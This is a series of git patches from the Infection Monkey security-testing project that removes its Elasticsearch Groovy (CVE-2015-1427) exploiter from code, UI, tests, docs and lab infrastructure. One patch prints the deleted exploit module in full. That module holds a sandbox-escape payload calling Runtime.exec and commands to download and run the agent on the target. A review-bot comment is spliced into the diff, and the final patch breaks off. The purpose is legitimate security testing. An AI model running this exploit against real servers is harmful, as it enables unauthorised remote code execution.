From 31e6c09673c72a47338b094df00a3269b5b46953 Mon Sep 17 00:00:00 2001
From: Shreya Malviya
Date: Thu, 24 Feb 2022 14:42:36 +0530
Subject: [PATCH 1/9] Project: Replace ElasticSearch with Zerologon in README.md
---
 README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 7342c49a7..6b427e036 100644
--- a/README.md
+++ b/README.md
@@ -47,7 +47,7 @@ The Infection Monkey uses the following techniques and exploits to propagate to
 * SMB
 * WMI
 * Log4Shell
- * Elastic Search (CVE-2015-1427)
+ * Zerologon
 * Weblogic server
 * and more, see our [Documentation hub](https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/) for more information about our RCE exploiters.
From b1fbf64730ddc60c7c6edd34064eb5ff27df3fbb Mon Sep 17 00:00:00 2001
From: Shreya Malviya
Date: Thu, 24 Feb 2022 14:43:59 +0530
Subject: [PATCH 2/9] Docs: Remove ElasticSearch exploiter documentation
---
 docs/content/reference/exploiters/ElasticGroovy.md | 13 -------------
 1 file changed, 13 deletions(-)
 delete mode 100644 docs/content/reference/exploiters/ElasticGroovy.md
diff --git a/docs/content/reference/exploiters/ElasticGroovy.md b/docs/content/reference/exploiters/ElasticGroovy.md
deleted file mode 100644
index 86ae4247c..000000000
--- a/docs/content/reference/exploiters/ElasticGroovy.md
+++ /dev/null
@@ -1,13 +0,0 @@
----
-title: "ElasticGroovy"
-date: 2020-07-14T08:41:40+03:00
-draft: false
-tags: ["exploit", "windows", "linux"]
----
-### Description
-
-CVE-2015-1427
-
-> The Groovy scripting engine in Elasticsearch before 1.3.8 and 1.4.x (before 1.4.3) allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script.
-
-The logic is based on the [Metasploit module](https://github.com/rapid7/metasploit-framework/blob/12198a088132f047e0a86724bc5ebba92a73ac66/modules/exploits/multi/elasticsearch/search_groovy_script.rb).
From b6438edb82ddd6eb714a1f9714419097c6ff2c45 Mon Sep 17 00:00:00 2001
From: Shreya Malviya
Date: Thu, 24 Feb 2022 14:55:42 +0530
Subject: [PATCH 3/9] Agent: Remove ElasticGroovyExploiter
---
 monkey/infection_monkey/example.conf | 1 -
 .../infection_monkey/exploit/elasticgroovy.py | 114 ------------------
 2 files changed, 115 deletions(-)
 delete mode 100644 monkey/infection_monkey/exploit/elasticgroovy.py
diff --git a/monkey/infection_monkey/example.conf b/monkey/infection_monkey/example.conf
index efb9a4350..b1a25d51f 100644
--- a/monkey/infection_monkey/example.conf
+++ b/monkey/infection_monkey/example.conf
@@ -27,7 +27,6 @@
 "SSHExploiter",
 "SmbExploiter",
 "WmiExploiter",
- "ElasticGroovyExploiter",
 "Struts2Exploiter",
 "WebLogicExploiter",
 "HadoopExploiter",
diff --git a/monkey/infection_monkey/exploit/elasticgroovy.py b/monkey/infection_monkey/exploit/elasticgroovy.py
deleted file mode 100644
index 6c2751418..000000000
--- a/monkey/infection_monkey/exploit/elasticgroovy.py
+++ /dev/null
@@ -1,114 +0,0 @@
-"""
- Implementation is based on elastic search groovy exploit by metasploit
- https://github.com/rapid7/metasploit-framework/blob/12198a088132f047e0a86724bc5ebba92a73ac66
- /modules/exploits/multi/elasticsearch/search_groovy_script.rb
- Max vulnerable elasticsearch version is "1.4.2"
-"""
-
-import json
-import logging
-import re
-
-import requests
-
-from common.common_consts.network_consts import ES_SERVICE
-from common.utils.attack_utils import BITS_UPLOAD_STRING, ScanStatus
-from infection_monkey.exploit.web_rce import WebRCE
-from infection_monkey.model import (
- BITSADMIN_CMDLINE_HTTP,
- CHECK_COMMAND,
- CMD_PREFIX,
- DOWNLOAD_TIMEOUT,
- ID_STRING,
- WGET_HTTP_UPLOAD,
-)
-from infection_monkey.network_scanning.elasticfinger import ES_PORT
-from infection_monkey.telemetry.attack.t1197_telem import T1197Telem
-
-logger = logging.getLogger(__name__)
-
-
-class ElasticGroovyExploiter(WebRCE):
- # attack URLs
- MONKEY_RESULT_FIELD = "monkey_result"
- GENERIC_QUERY = (
- """{"size":1, "script_fields":{"%s": {"script": "%%s"}}}""" % MONKEY_RESULT_FIELD
- )
- JAVA_CMD = GENERIC_QUERY % (
- """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec("""
- """\\"%s\\").getText()"""
- )
-
- _TARGET_OS_TYPE = ["linux", "windows"]
- _EXPLOITED_SERVICE = "Elastic search"
-
- def __init__(self, host):
- super(ElasticGroovyExploiter, self).__init__(host)
-
- def get_exploit_config(self):
- exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config()
- exploit_config["dropper"] = True
- exploit_config["url_extensions"] = ["_search?pretty"]
- exploit_config["upload_commands"] = {
- "linux": WGET_HTTP_UPLOAD,
- "windows": CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP,
- }
- return exploit_config
-
- def get_open_service_ports(self, port_list, names):
- # We must append elastic port we get from elastic fingerprint module because It's not
- # marked as 'http' service
- valid_ports = WebRCE.get_open_service_ports(self.host, port_list,
names)
- if ES_SERVICE in self.host.services:
- valid_ports.append([ES_PORT, False])
- return valid_ports
-
- def exploit(self, url, command):
- command = re.sub(r"\\", r"\\\\\\\\", command)
- payload = self.JAVA_CMD % command
- try:
- response = requests.get(url, data=payload, timeout=DOWNLOAD_TIMEOUT)
- except requests.ReadTimeout:
- logger.error(
- "Elastic couldn't upload monkey, because server didn't respond to upload "
- "request."
- )
- return False
- result = self.get_results(response)
- if not result:
- return False
- return result[0]
-
- def upload_monkey(self, url, commands=None):
- result = super(ElasticGroovyExploiter, self).upload_monkey(url, commands)
- if "windows" in self.host.os["type"] and result:
- T1197Telem(ScanStatus.USED, self.host, BITS_UPLOAD_STRING).send()
- return result
-
- def get_results(self, response):
- """
- Extracts the result data from our attack
- :return: List of data fields or None
- """
- try:
- json_resp = json.loads(response.text)
- return json_resp["hits"]["hits"][0]["fields"][self.MONKEY_RESULT_FIELD]
- except (KeyError, IndexError):
- return None
-
- def check_if_exploitable(self, url):
- # Overridden web_rce method that adds CMD prefix for windows command
- try:
- if "windows" in self.host.os["type"]:
- resp = self.exploit(url, CMD_PREFIX + " " + CHECK_COMMAND)
- else:
- resp = self.exploit(url, CHECK_COMMAND)
- if resp is True:
- return True
- elif resp is not False and ID_STRING in resp:
- return True
- else:
- return False
- except Exception as e:
- logger.error("Host's exploitability check failed due to: %s" % e)
- return False
From 3ff7daa2d563053fbff9b51d90c7f2b21a72f86f Mon Sep 17 00:00:00 2001
From: Shreya Malviya
Date: Thu, 24 Feb 2022 15:03:57 +0530
Subject: [PATCH 4/9] UI: Remove ElasticGroovyExploiter reporting
---
 .../cc/services/config_schema/basic.py | 1 -
 .../definitions/exploiter_classes.py | 9 --------
 .../cc/services/reporting/aws_exporter.py | 16 -------------
 .../exploiter_descriptor_enum.py | 3 ---
 .../report-components/SecurityReport.js | 6 -----
 .../security/issues/ElasticIssue.js | 23 -------------------
 6 files changed, 58 deletions(-)
 delete mode 100644 monkey/monkey_island/cc/ui/src/components/report-components/security/issues/ElasticIssue.js
diff --git a/monkey/monkey_island/cc/services/config_schema/basic.py b/monkey/monkey_island/cc/services/config_schema/basic.py
index 0f841e968..a67205234 100644
--- a/monkey/monkey_island/cc/services/config_schema/basic.py
+++ b/monkey/monkey_island/cc/services/config_schema/basic.py
@@ -18,7 +18,6 @@ BASIC = {
 "WmiExploiter",
 "SSHExploiter",
 "Log4ShellExploiter",
- "ElasticGroovyExploiter",
 "Struts2Exploiter",
 "WebLogicExploiter",
 "HadoopExploiter",
diff --git a/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py b/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py
index e9a5ac5ea..a6e0fbd4d 100644
--- a/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py
+++ b/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py
@@ -53,15 +53,6 @@ EXPLOITER_CLASSES = {
 "link": "https://www.guardicore.com/infectionmonkey/docs/reference"
 "/exploiters/sshexec/",
 },
- {
- "type": "string",
- "enum": ["ElasticGroovyExploiter"],
- "title": "ElasticGroovy Exploiter",
- "safe": True,
- "info": "CVE-2015-1427. Logic is based on Metasploit module.",
- "link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters"
- "/elasticgroovy/",
- },
 {
 "type": "string",
 "enum": ["Struts2Exploiter"],
diff --git a/monkey/monkey_island/cc/services/reporting/aws_exporter.py b/monkey/monkey_island/cc/services/reporting/aws_exporter.py
index 00d738b07..137b26224 100644
--- a/monkey/monkey_island/cc/services/reporting/aws_exporter.py
+++ b/monkey/monkey_island/cc/services/reporting/aws_exporter.py
@@ -69,7 +69,6 @@ class AWSExporter(Exporter):
 CredentialType.KEY.value: AWSExporter._handle_ssh_key_issue,
 },
 "tunnel": AWSExporter._handle_tunnel_issue,
- ExploiterDescriptorEnum.ELASTIC.value.class_name: AWSExporter._handle_elastic_issue,
 ExploiterDescriptorEnum.SMB.value.class_name: {
 CredentialType.PASSWORD.value: AWSExporter._handle_smb_password_issue,
 CredentialType.HASH.value: AWSExporter._handle_smb_pth_issue,
@@ -245,21 +244,6 @@ class AWSExporter(Exporter):
 instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
 )
- @staticmethod
- def _handle_elastic_issue(issue, instance_arn):
-
- return AWSExporter._build_generic_finding(
- severity=10,
- title="Elastic Search servers are vulnerable to CVE-2015-1427",
- description="Update your Elastic Search server to version 1.4.3 and up.",
- recommendation="The machine {0}({1}) is vulnerable to an Elastic Groovy attack. "
- "The attack was made "
- "possible because the Elastic Search server was not patched "
- "against CVE-2015-1427.".format(issue["machine"], issue["ip_address"]),
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
- )
- @staticmethod - def _handle_island_cross_segment_issue(issue, instance_arn):
diff --git a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py
index 91855329e..2425b6435 100644
--- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py
+++ b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py
@@ -28,9 +28,6 @@ class ExploiterDescriptorEnum(Enum):
 SMB = ExploiterDescriptor("SmbExploiter", "SMB Exploiter", CredExploitProcessor)
 WMI = ExploiterDescriptor("WmiExploiter", "WMI Exploiter", CredExploitProcessor)
 SSH = ExploiterDescriptor("SSHExploiter", "SSH Exploiter", CredExploitProcessor)
- ELASTIC = ExploiterDescriptor(
- "ElasticGroovyExploiter", "Elastic Groovy Exploiter", ExploitProcessor
- )
 STRUTS2 = ExploiterDescriptor("Struts2Exploiter", "Struts2 Exploiter", ExploitProcessor)
 WEBLOGIC = ExploiterDescriptor(
 "WebLogicExploiter", "Oracle WebLogic Exploiter", ExploitProcessor
diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js b/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js
index a923d01f2..932879fea 100644
--- a/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js
+++ b/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js
@@ -27,7 +27,6 @@ import {mssqlIssueOverview, mssqlIssueReport} from './security/issues/MssqlIssue
 import {drupalIssueOverview, drupalIssueReport} from './security/issues/DrupalIssue';
 import {wmiPasswordIssueReport, wmiPthIssueReport} from './security/issues/WmiIssue';
 import {sshKeysReport, shhIssueReport, sshIssueOverview} from './security/issues/SshIssue';
-import {elasticIssueOverview, elasticIssueReport} from './security/issues/ElasticIssue';
 import {log4shellIssueOverview, log4shellIssueReport} from './security/issues/Log4ShellIssue';
 import {
 crossSegmentIssueOverview,
@@ -119,11 +118,6 @@ class ReportPageComponent extends AuthComponent {
 },
 [this.issueContentTypes.TYPE]: this.issueTypes.DANGER
 },
- 'ElasticGroovyExploiter': {
- [this.issueContentTypes.OVERVIEW]: elasticIssueOverview,
- [this.issueContentTypes.REPORT]: elasticIssueReport,
- [this.issueContentTypes.TYPE]: this.issueTypes.DANGER
- },
 'PowerShellExploiter': {
 [this.issueContentTypes.OVERVIEW]: powershellIssueOverview,
 [this.issueContentTypes.REPORT]: powershellIssueReport,
diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/ElasticIssue.js b/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/ElasticIssue.js
deleted file mode 100644
index 4d389bf2b..000000000
--- a/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/ElasticIssue.js
+++ /dev/null
@@ -1,23 +0,0 @@
-import React from 'react';
-import CollapsibleWellComponent from '../CollapsibleWell';
-
-export function elasticIssueOverview() {
- return (
  • Elasticsearch servers are vulnerable to CVE-2015-1427. -
  • ) -} - -export function elasticIssueReport(issue) { - return ( - <> - Update your Elastic Search server to version 1.4.3 and up. - - The machine {issue.machine} ({issue.ip_address}) is vulnerable to an Elastic Groovy attack. -
    - The attack was made possible because the Elastic Search server was not patched against CVE-2015-1427. -
    - - ); -} From 35d39b46c7c48005db84cd3023f8d8ca0959520e Mon Sep 17 00:00:00 2001 From: Shreya Malviya Date: Thu, 24 Feb 2022 15:10:31 +0530 Subject: [PATCH 5/9] UT: Remove ElasticGroovyExploiter references --- .../monkey_configs/automated_master_config.json | 1 - monkey/tests/data_for_tests/monkey_configs/flat_config.json | 1 - .../data_for_tests/monkey_configs/monkey_config_standard.json | 1 - .../cc/services/edge/test_displayed_edge_service.py | 4 ++-- .../reporting/exploitations/test_monkey_exploitation.py | 2 +- .../monkey_island/cc/services/reporting/test_report.py | 4 ++-- .../tests/unit_tests/monkey_island/cc/services/test_config.py | 1 - 7 files changed, 5 insertions(+), 9 deletions(-) diff --git a/monkey/tests/data_for_tests/monkey_configs/automated_master_config.json b/monkey/tests/data_for_tests/monkey_configs/automated_master_config.json index aaed36c1c..c89ab6c04 100644 --- a/monkey/tests/data_for_tests/monkey_configs/automated_master_config.json +++ b/monkey/tests/data_for_tests/monkey_configs/automated_master_config.json @@ -54,7 +54,6 @@ ], "vulnerability": [ {"name": "DrupalExploiter"}, - {"name": "ElasticGroovyExploiter"}, {"name": "HadoopExploiter"}, {"name": "ShellShockExploiter"}, {"name": "Struts2Exploiter"}, diff --git a/monkey/tests/data_for_tests/monkey_configs/flat_config.json b/monkey/tests/data_for_tests/monkey_configs/flat_config.json index b4ec2c46c..acce7f2ae 100644 --- a/monkey/tests/data_for_tests/monkey_configs/flat_config.json +++ b/monkey/tests/data_for_tests/monkey_configs/flat_config.json @@ -52,7 +52,6 @@ "SmbExploiter", "WmiExploiter", "SSHExploiter", - "ElasticGroovyExploiter", "Struts2Exploiter", "ZerologonExploiter", "WebLogicExploiter", diff --git a/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json b/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json index 33944c305..658e4cc68 100644 --- a/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json 
+++ b/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json
@@ -5,7 +5,6 @@
 "SmbExploiter",
 "WmiExploiter",
 "SSHExploiter",
- "ElasticGroovyExploiter",
 "Struts2Exploiter",
 "WebLogicExploiter",
 "HadoopExploiter",
diff --git a/monkey/tests/unit_tests/monkey_island/cc/services/edge/test_displayed_edge_service.py b/monkey/tests/unit_tests/monkey_island/cc/services/edge/test_displayed_edge_service.py
index 4c7ca36a7..aadd13f60 100644
--- a/monkey/tests/unit_tests/monkey_island/cc/services/edge/test_displayed_edge_service.py
+++ b/monkey/tests/unit_tests/monkey_island/cc/services/edge/test_displayed_edge_service.py
@@ -27,9 +27,9 @@ SCAN_DATA_MOCK = [
 EXPLOIT_DATA_MOCK = [
 {
 "result": True,
- "exploiter": "ElasticGroovyExploiter",
+ "exploiter": "ZerologonExploiter",
 "info": {
- "display_name": "Elastic search",
+ "display_name": "Zerologon",
 "started": "2020-05-11T08:59:38.105Z",
 "finished": "2020-05-11T08:59:38.106Z",
 "vulnerable_urls": [],
diff --git a/monkey/tests/unit_tests/monkey_island/cc/services/reporting/exploitations/test_monkey_exploitation.py b/monkey/tests/unit_tests/monkey_island/cc/services/reporting/exploitations/test_monkey_exploitation.py
index f40e09c62..1c0377807 100644
--- a/monkey/tests/unit_tests/monkey_island/cc/services/reporting/exploitations/test_monkey_exploitation.py
+++ b/monkey/tests/unit_tests/monkey_island/cc/services/reporting/exploitations/test_monkey_exploitation.py
@@ -11,7 +11,7 @@ from monkey_island.cc.services.reporting.exploitations.monkey_exploitation impor
 def test_get_exploits_used_on_node__2_exploits():
 exploits = get_exploits_used_on_node(NODE_DICT)
- assert sorted(exploits) == sorted(["Elastic Groovy Exploiter", "Drupal Server Exploiter"])
+ assert sorted(exploits) == sorted(["Zerologon Exploiter", "Drupal Server Exploiter"])
 def test_get_exploits_used_on_node__duplicate_exploits():
diff --git a/monkey/tests/unit_tests/monkey_island/cc/services/reporting/test_report.py b/monkey/tests/unit_tests/monkey_island/cc/services/reporting/test_report.py
index efc59f5ae..c33f0087b 100644
--- a/monkey/tests/unit_tests/monkey_island/cc/services/reporting/test_report.py
+++ b/monkey/tests/unit_tests/monkey_island/cc/services/reporting/test_report.py
@@ -110,9 +110,9 @@ NODE_DICT = {
 },
 {
 "exploitation_result": True,
- "exploiter": "ElasticGroovyExploiter",
+ "exploiter": "ZerologonExploiter",
 "info": {
- "display_name": "Elastic search",
+ "display_name": "Zerologon",
 "started": datetime.datetime(2021, 2, 19, 9, 0, 15, 16000),
 "finished": datetime.datetime(2021, 2, 19, 9, 0, 15, 17000),
 "vulnerable_urls": [],
diff --git a/monkey/tests/unit_tests/monkey_island/cc/services/test_config.py b/monkey/tests/unit_tests/monkey_island/cc/services/test_config.py
index 58e762036..010e1ce34 100644
--- a/monkey/tests/unit_tests/monkey_island/cc/services/test_config.py
+++ b/monkey/tests/unit_tests/monkey_island/cc/services/test_config.py
@@ -185,7 +185,6 @@ def test_format_config_for_agent__exploiters(flat_monkey_config):
 ],
 "vulnerability": [
 {"name": "DrupalExploiter", "options": {}},
- {"name": "ElasticGroovyExploiter", "options": {}},
 {"name": "HadoopExploiter", "options": {}},
 {"name": "Struts2Exploiter", "options": {}},
 {"name": "WebLogicExploiter", "options": {}},
From a599edec15b4e16d2218bf84059b9a4bdfdf84f3 Mon Sep 17 00:00:00 2001
From: Shreya Malviya
Date: Thu, 24 Feb 2022 15:12:00 +0530
Subject: [PATCH 6/9] Project: Remove ELASTIC exploiter descriptor enum from Vulture's allowlist
---
 vulture_allowlist.py | 1 -
 1 file changed, 1 deletion(-)
diff --git a/vulture_allowlist.py b/vulture_allowlist.py
index 655590dcf..67399ff55 100644
--- a/vulture_allowlist.py
+++ b/vulture_allowlist.py
@@ -56,7 +56,6 @@ credential_type # unused variable (monkey/monkey_island/cc/services/reporting/i
 password_restored # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_report_info.py:23)
 SSH # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:30)
 SAMBACRY # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:31)
-ELASTIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:32)
 STRUTS2 # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:39)
 WEBLOGIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:40)
 HADOOP # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:43)
From 6c7e63046580b070e32f7bae2aee3d18a4044c66 Mon Sep 17 00:00:00 2001
From: Shreya Malviya
Date: Thu, 24 Feb 2022 15:14:32 +0530
Subject: [PATCH 7/9] BB: Remove ElasticGroovyExploiter references
---
 .../blackbox/config_templates/elastic.py | 20 -------------------
 .../blackbox/config_templates/performance.py | 1 -
 .../blackbox/gcp_test_machine_list.py | 2 --
 envs/monkey_zoo/blackbox/test_blackbox.py | 6 +-----
 .../utils/config_generation_script.py | 2 --
 5 files changed, 1 insertion(+), 30 deletions(-)
 delete mode 100644 envs/monkey_zoo/blackbox/config_templates/elastic.py
diff --git a/envs/monkey_zoo/blackbox/config_templates/elastic.py b/envs/monkey_zoo/blackbox/config_templates/elastic.py
deleted file mode 100644
index 0a89b9cc3..000000000
--- a/envs/monkey_zoo/blackbox/config_templates/elastic.py
+++ /dev/null
@@ -1,20 +0,0 @@
-from copy import copy
-
-from envs.monkey_zoo.blackbox.config_templates.base_template import BaseTemplate
-from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemplate
-
-
-class Elastic(ConfigTemplate):
-
- config_values = copy(BaseTemplate.config_values)
-
- config_values.update(
- {
- "basic.exploiters.exploiter_classes": ["ElasticGroovyExploiter"],
- "internal.classes.finger_classes": ["PingScanner", "HTTPFinger", "ElasticFinger"],
- "basic_network.scope.subnet_scan_list": ["10.2.2.4", "10.2.2.5"],
- "basic_network.scope.depth": 1,
- "internal.network.tcp_scanner.HTTP_PORTS": [9200],
- "internal.network.tcp_scanner.tcp_target_ports": [],
- }
- )
diff --git a/envs/monkey_zoo/blackbox/config_templates/performance.py b/envs/monkey_zoo/blackbox/config_templates/performance.py
index 6108664a7..4eb8a3243 100644
--- a/envs/monkey_zoo/blackbox/config_templates/performance.py
+++ b/envs/monkey_zoo/blackbox/config_templates/performance.py
@@ -16,7 +16,6 @@ class Performance(ConfigTemplate):
 "SmbExploiter",
 "WmiExploiter",
 "SSHExploiter",
- "ElasticGroovyExploiter",
 "Struts2Exploiter",
 "WebLogicExploiter",
 "HadoopExploiter",
diff --git a/envs/monkey_zoo/blackbox/gcp_test_machine_list.py b/envs/monkey_zoo/blackbox/gcp_test_machine_list.py
index eadbd6213..1b5043e93 100644
--- a/envs/monkey_zoo/blackbox/gcp_test_machine_list.py
+++ b/envs/monkey_zoo/blackbox/gcp_test_machine_list.py
@@ -2,8 +2,6 @@ GCP_TEST_MACHINE_LIST = {
 "europe-west3-a": [
 "sshkeys-11",
 "sshkeys-12",
- "elastic-4",
- "elastic-5",
 "hadoop-2",
 "hadoop-3",
 "mssql-16",
diff --git a/envs/monkey_zoo/blackbox/test_blackbox.py b/envs/monkey_zoo/blackbox/test_blackbox.py
index 2db234ed2..ff80451db 100644
--- a/envs/monkey_zoo/blackbox/test_blackbox.py
+++ b/envs/monkey_zoo/blackbox/test_blackbox.py
@@ -9,7 +9,6 @@ from envs.monkey_zoo.blackbox.analyzers.communication_analyzer import Communicat
 from envs.monkey_zoo.blackbox.analyzers.zerologon_analyzer import ZerologonAnalyzer
 from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemplate
 from envs.monkey_zoo.blackbox.config_templates.drupal import Drupal
-from envs.monkey_zoo.blackbox.config_templates.elastic import Elastic
 from envs.monkey_zoo.blackbox.config_templates.hadoop import Hadoop
 from envs.monkey_zoo.blackbox.config_templates.log4j_logstash import Log4jLogstash
 from envs.monkey_zoo.blackbox.config_templates.log4j_solr import Log4jSolr
@@ -190,9 +189,6 @@ class TestMonkeyBlackbox:
 def test_drupal_exploiter(self, island_client):
 TestMonkeyBlackbox.run_exploitation_test(island_client, Drupal, "Drupal_exploiter")
- def test_elastic_exploiter(self, island_client):
- TestMonkeyBlackbox.run_exploitation_test(island_client, Elastic, "Elastic_exploiter")
- - def test_struts_exploiter(self, island_client):
 TestMonkeyBlackbox.run_exploitation_test(island_client, Struts2, "Struts2_exploiter")
@@ -256,7 +252,7 @@ class TestMonkeyBlackbox:
 )
 def test_report_generation_performance(self, island_client, quick_performance_tests):
 """
- This test includes the SSH + Elastic + Hadoop + MSSQL machines all in one test
+ This test includes the SSH + Hadoop + MSSQL machines all in one test
 for a total of 8 machines including the Monkey Island.
 Is has 2 analyzers - the regular one which checks all the Monkeys
diff --git a/envs/monkey_zoo/blackbox/utils/config_generation_script.py b/envs/monkey_zoo/blackbox/utils/config_generation_script.py
index 3f787870d..1bb66a080 100644
--- a/envs/monkey_zoo/blackbox/utils/config_generation_script.py
+++ b/envs/monkey_zoo/blackbox/utils/config_generation_script.py
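Review bot: In the last hunk of test_blackbox.py, the docstring of test_report_generation_performance drops Elastic from the list of machines on the changed line but the next context line still says `for a total of 8 machines including the Monkey Island.`; elastic-4 and elastic-5 are removed from GCP_TEST_MACHINE_LIST in this same patch, so if they were part of that count the total is now stale and should be recounted and updated in the same commit. The same context line also carries the pre-existing typo `Is has 2 analyzers`, which would read `It has 2 analyzers` and is cheap to fix while the docstring is being touched. The body of test_report_generation_performance continues outside the hunk, so whether the Performance template still scans the hosts that were the Elastic targets cannot be confirmed from this diff.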
@@ -4,7 +4,6 @@ from typing import Type
 from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemplate
 from envs.monkey_zoo.blackbox.config_templates.drupal import Drupal
-from envs.monkey_zoo.blackbox.config_templates.elastic import Elastic
 from envs.monkey_zoo.blackbox.config_templates.hadoop import Hadoop
 from envs.monkey_zoo.blackbox.config_templates.log4j_logstash import Log4jLogstash
 from envs.monkey_zoo.blackbox.config_templates.log4j_solr import Log4jSolr
@@ -39,7 +38,6 @@ island_client = MonkeyIslandClient(args.island_ip)
 CONFIG_TEMPLATES = [
- Elastic,
 Hadoop,
 Mssql,
 Performance,
From 7d76d949597690122aadb28fc899e43e35becb2e Mon Sep 17 00:00:00 2001
From: Shreya Malviya
Date: Thu, 24 Feb 2022 15:16:06 +0530
Subject: [PATCH 8/9] Zoo: Remove Elastic machines from terraform scripts and docs
---
 envs/monkey_zoo/docs/fullDocs.md | 76 ------------------------
 envs/monkey_zoo/terraform/images.tf | 8 ---
 envs/monkey_zoo/terraform/monkey_zoo.tf | 30 ----------
 3 files changed, 114 deletions(-)
diff --git a/envs/monkey_zoo/docs/fullDocs.md b/envs/monkey_zoo/docs/fullDocs.md
index 0381eae34..08ffb4e5e 100644
--- a/envs/monkey_zoo/docs/fullDocs.md
+++ b/envs/monkey_zoo/docs/fullDocs.md
@@ -9,8 +9,6 @@ This document describes Infection Monkey’s test network, how to deploy and use
 [Machines](#machines)
    [Nr. 2 Hadoop](#_Toc526517182)
    [Nr. 3 Hadoop](#_Toc526517183)
    -[Nr. 4 Elastic](#_Toc526517184)
    -[Nr. 5 Elastic](#_Toc526517185)
    [Nr. 9 Tunneling M1](#_Toc536021462)
    [Nr. 10 Tunneling M2](#_Toc536021463)
    [Nr. 11 SSH key steal](#_Toc526517190)
    @@ -251,80 +249,6 @@ Update all requirements using deployment script:
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

    Nr. 4 Elastic

    -

    (10.2.2.4)

    (Vulnerable)
    OS:Ubuntu 16.04.05 x64
    Software:

    JDK,

    -

    Elastic 1.4.2

    Default server’s port:9200
    Server’s config:Default
    Scan results:Machine exploited using Elastic exploiter
    Notes:Quick tutorial on how to add entries (was useful when setting up).
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

    Nr. 5 Elastic

    -

    (10.2.2.5)

    (Vulnerable)
    OS:Windows 10 x64
    Software:

    JDK,

    -

    Elastic 1.4.2

    Default server’s port:9200
    Server’s config:Default
    Scan results:Machine exploited using Elastic exploiter
    Notes:Quick tutorial on how to add entries (was useful when setting up).
    -
diff --git a/envs/monkey_zoo/terraform/images.tf b/envs/monkey_zoo/terraform/images.tf
index 23632514a..3a197b720 100644
--- a/envs/monkey_zoo/terraform/images.tf
+++ b/envs/monkey_zoo/terraform/images.tf
@@ -7,14 +7,6 @@ data "google_compute_image" "hadoop-3" {
 name = "hadoop-3"
 project = local.monkeyzoo_project
 }
-data "google_compute_image" "elastic-4" {
- name = "elastic-4"
- project = local.monkeyzoo_project
-}
-data "google_compute_image" "elastic-5" {
- name = "elastic-5"
- project = local.monkeyzoo_project
-}
 data "google_compute_image" "tunneling-9" {
 name = "tunneling-9"
 project = local.monkeyzoo_project
diff --git a/envs/monkey_zoo/terraform/monkey_zoo.tf b/envs/monkey_zoo/terraform/monkey_zoo.tf
index eff0a44e5..0a32f2d05 100644
--- a/envs/monkey_zoo/terraform/monkey_zoo.tf
+++ b/envs/monkey_zoo/terraform/monkey_zoo.tf
@@ -76,36 +76,6 @@ resource "google_compute_instance_from_template" "hadoop-3" {
 }
 }
-resource "google_compute_instance_from_template" "elastic-4" {
- name = "${local.resource_prefix}elastic-4"
- source_instance_template = local.default_ubuntu
- boot_disk{
- initialize_params {
- image = data.google_compute_image.elastic-4.self_link
- }
- auto_delete = true
- }
- network_interface {
- subnetwork="${local.resource_prefix}monkeyzoo-main"
- network_ip="10.2.2.4"
- }
-}
-
-resource "google_compute_instance_from_template" "elastic-5" {
- name = "${local.resource_prefix}elastic-5"
- source_instance_template = local.default_windows
- boot_disk{
- initialize_params {
- image = data.google_compute_image.elastic-5.self_link
- }
- auto_delete = true
- }
- network_interface {
- subnetwork="${local.resource_prefix}monkeyzoo-main"
- network_ip="10.2.2.5"
- }
-}
-
 resource "google_compute_instance_from_template" "tunneling-9" {
 name = "${local.resource_prefix}tunneling-9"
 source_instance_template = local.default_ubuntu
From 7e362283fa4b91430f9d93b6751b344af5edc50c Mon Sep 17 00:00:00 2001
From: Shreya Malviya
Date: Thu, 24 Feb 2022 19:14:20 +0530
Subject: [PATCH 9/9] Changelog: Add entry for removing the Elastic Search exploiter
---
 CHANGELOG.md | 1 +
 1 file changed, 1 insertion(+)
diff --git a/CHANGELOG.md b/CHANGELOG.md
